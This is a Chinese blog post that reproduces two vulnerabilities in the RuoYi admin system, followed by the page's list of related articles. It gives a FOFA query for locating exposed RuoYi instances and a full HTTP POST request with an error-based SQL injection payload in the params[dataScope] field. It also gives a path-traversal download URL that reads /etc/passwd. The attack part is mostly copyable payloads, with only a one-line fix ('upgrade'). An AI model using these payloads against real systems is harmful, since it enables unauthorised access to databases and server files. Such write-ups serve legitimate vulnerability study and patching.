若依(Ruoyi)管理系统后台sql注入+任意文件下载漏洞

最新推荐文章于 2024-05-25 19:27:31 发布
最新推荐文章于 2024-05-25 19:27:31 发布
阅读量7.0k 收藏 11
点赞数 8
分类专栏: 漏洞复现 渗透测试 文章标签: 若依(Ruoyi)管理系统 后台sql注入 任意文件下载漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/adminxe/article/details/119345475
版权

0x00若依介绍

若依可以用于所有的Web应用程序,如网站管理后台,网站会员中心,CMS,CRM,OA。所有前端后台代码封装过后十分精简易上手,出错概率低。同时支持移动客户端访问。系统会陆续更新一些实用功能。
寓意:你若不离不弃,我必生死相依

0x01漏洞描述

若依管理系统是基于SpringBoot的权限管理系统,后台存在sql注入、任意文件下载漏洞,可以读取数据库、服务器上的任意文件内容。

0x02FOFA

app=”若依-管理系统”

0x03漏洞复现

SQL注入

这是个后台洞,所以需要进入到后台嘤嘤嘤

在这里插入图片描述
漏洞位置在”系统管理”里中的”角色管理中”
http://xxxxxxx/system/role/list
在这里插入图片描述

POC:
pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params[beginTime]=&params[endTime]=&params[dataScope]=and
extractvalue(1,concat(0x7e,substring((select database()),1,32),0x7e))

POST /system/role/list HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: JSESSIONID=dea10cdb-9d3c-4f6a-854a-ea1ca540a992
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 195

pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params[beginTime]=&params[endTime]=&params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))

成功利用报错注入拿到数据数据库名称

在这里插入图片描述

任意文件下载

影响版本:RuoYi < v4.5.1

在这里插入图片描述

登录后台后直接访问以下url即可下载文件

http://xxx/common/download/resource?resource/profile/../../../../etc/passwd

在这里插入图片描述

0x04漏洞修复

更新升级到最新版本

转载请注明:Adminxe's Blog » 若依(Ruoyi)管理系统后台sql注入+任意文件下载漏洞

Adminxe
关注
  • 8
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
若依框架漏洞(若依管理框架漏洞复现)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
03-28 4338
若依框架是一个 Java EE 企业级快速开发平台,基于经典技术组合(Spring Boot、Apache Shiro、MyBatis、Thymeleaf、Bootstrap),内置模块如:部门管理、角色用户、菜单及按钮授权、数据权限、系统参数、日志管理、通知公告等。在线定时任务配置;支持集群,支持多数据源,支持分布式事务。若依框架漏洞默认口令漏洞早期若依框架漏洞版本有反序列化漏洞 ,执行任意命令,漏洞复现,祭出fofa大法,fofa语法如下
若依管理系统后台sql注入漏洞分析
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
02-23 2093
本文以RuoYi为例学习并整理了基于Mybatis框架的sql注入原理和场景,为高效快速挖掘基于Mybatis框架的sql注入提供一种思路和参考。若依管理系统是基于SpringBoot框架开发的,并利用MyBatis框架进行数据库操作。在RuoYi
CVE-2023-49371 RuoYi 若依后台管理系统存在SQL注入漏洞
qq_27536045的博客
12-14 1976
CVE-2023-49371|RuoYi 若依后台管理系统存在SQL注入漏洞漏洞复现)
ruoyi漏洞poc汇总及其原理分析(源码分析)
最新发布
问彡心的博客
05-25 2690
汇总网上常见的若依漏洞poc,根据不同版本的参照对比,分析每个漏洞在不同版本中的代码表现形式,学习这些漏洞后台的代码是如何编写的以及如何进行修复的
漏洞挖掘 | ruoyi框架管理系统漏洞
2301_80127209的博客
04-01 3684
在挖src的时候,可以通过信息收集收集弱口令,然后通过后台弱口令进入后台:发现一个弱口令进去后:【魔方老师提醒才发现,这个蓝色的草丛其实可以大致判断是若依系统】看这界面,是不是很像ruoyi插件一看:前端vue.js加上登录的cookie rememberMe:【登录失败时bp抓包相应包有remeberMe=delete】得知登录为shiro框架八九不离十后台就是ruoyi框架的管理系统了。
若依系统前后台漏洞大全
热门推荐
FY10033的博客
08-07 4万+
漏洞影响范围RuoYi
从代码审计的角度分析 Ruoyi v4.7.6 的任意文件下载漏洞
新青年1号
05-26 3366
从代码审计的角度看 Ruoyi v4.7.6 任意文件下载漏洞
若依漏洞综合利用工具
Javachichi的博客
11-15 2575
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。(都打包成一块的了,不能一一展开,总共300多集)
若依框架html文件上传xss漏洞
weixin_43267639的博客
05-09 1935
若依框架内如果使用上传组件,前端会默认读取文件内容,如果文件格式是html,并且文件内容含有一些方法,如alert()等,就会直接运行可能对系统造成伤害,如果系统需要做安全测试,这属于一个储存型xss漏洞
拿来即用springboot+bootstrap整合若依后台管理系统
08-10
《全面解析:基于SpringBoot与Bootstrap的若依后台管理系统整合》 在当今的IT行业中,高效、便捷的后台管理系统已经成为企业信息化建设的关键一环。若依RuoYi)作为一个开源的后台管理框架,凭借其简洁的界面、...
若依后台管理系统 v4.1
09-29
"若依后台管理系统 v4.1"是一款专为Web应用程序设计的全面的后台管理系统。它源于作者对现有开源项目的不满意,希望通过自己的努力打造一个更符合个人需求的解决方案。这款系统在设计时考虑了易用性、灵活性和可扩展...
RuoYi若依管理系统-其他
06-11
RuoYi若依管理系统是一个基于SpringBoot的权限管理系统,代码易读易懂、界面简洁美观。 核心技术采用Spring、MyBatis、Shiro没有任何其它重度依赖。直接运行即可用。RuoYi若依管理系统功能:1、用户管理:用户是系统...
RuoYi-plus后台管理系统源代码
03-18
RuoYi-plus是一个基于RuoYi升级的springcloud版本管理系统。软件由SMP多商户后台管理系统+API后端接口组成,项目支持cms内容管理和商城业务,提供单机版服务、微服务体系双向选择,微服务集成分布式事务解决方案...
若依后台管理系统 v2.2
10-10
"若依后台管理系统 v2.2"是一款专为满足开发者个性化需求而设计的自定义后台管理系统。这款系统旨在填补市场上现有开源项目与个人特定需求之间的空白,为用户提供了一个灵活且可扩展的平台,适用于各种Web应用程序的...
CVE-2024-49371 RuoYi 若依后台管理系统存在SQL注入漏洞
2401_84164546的博客
04-09 1449
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
漏洞复现】若依系统后台SQL注入漏洞
晚风不及你
02-27 1024
若依系统(RuoYi)是一套基于SpringBoot的权限管理系统,核心技术采用Spring、MyBatis、Shiro,众多政府、企业采用它作为某些系统的权限管理后台,使用率较高。
若依框架(SpringBoot)增加SQL防注入处理,SpringBoot增加SQL防注入
qq_33317238的博客
12-23 2941
SpringBoot 添加 SQL注入处理,若依框架增加SQL注入处理
若依管理系统(前后端分离版本)的使用保姆级别教程(一)
2202_75334392的博客
07-15 3576
对于需要利用该框架的同学来说比较ok
pycharm专业版学生认证
09-18
PyCharm专业版学生认证是一种针对学生的认证机制,可以让学生在学习和开发过程中免费使用PyCharm专业版软件。这个认证机制是由JetBrains公司提供的,他们是一家全球知名的软件开发工具公司。 学生认证的好处之一是可以免费获取PyCharm专业版软件的全部功能。相比免费版和社区版,专业版提供了更多的功能和工具,能够更好地满足学生的学习和开发需求。例如,专业版支持更多的开发语言和框架,提供了强大的调试和模板功能,以及更好的代码编辑器和自动完成工具。 学生认证还可以让学生加入到PyCharm专业版学生认证社区中。这个社区提供了专属的学习资源、交流平台和活动,学生可以与其他认证学生和专业开发者一起分享经验、解决问题和合作开发项目。这个社区对于学生来说是一个非常有价值的学习和成长平台。 要进行学生认证,学生需要满足一定的条件和提供相关的证明材料,例如学生证明、在校学籍证明等。一旦认证通过,学生将会收到一份学生认证的官方证书,并可以通过官方网站下载和安装PyCharm专业版软件。 总之,PyCharm专业版学生认证为学生提供了更好的学习和开发工具,并且带来了更大的学习和交流机会。这对于专业计算机科学和编程的学生来说是一个非常有吸引力的机制,能够帮助他们更好地提升自己的能力和技术水平。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Adminxe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值